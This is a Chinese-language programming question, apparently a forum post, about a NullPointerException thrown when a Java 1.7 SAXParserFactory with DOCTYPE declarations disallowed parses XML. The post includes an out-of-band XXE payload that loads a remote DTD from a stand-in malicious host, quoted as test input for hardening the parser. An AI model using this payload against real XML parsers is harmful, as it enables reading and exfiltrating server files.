我已将SAXParserFactory上的“http://apache.org/xml/features/disallow-doctype-decl”功能设置为true,并在解析包含外部实体的xml时遇到NullPointerException。
代码:
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
错误:
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
有谁知道应该采取哪些额外的设置来避免NPE?
我正在使用java版本:1.7.0_51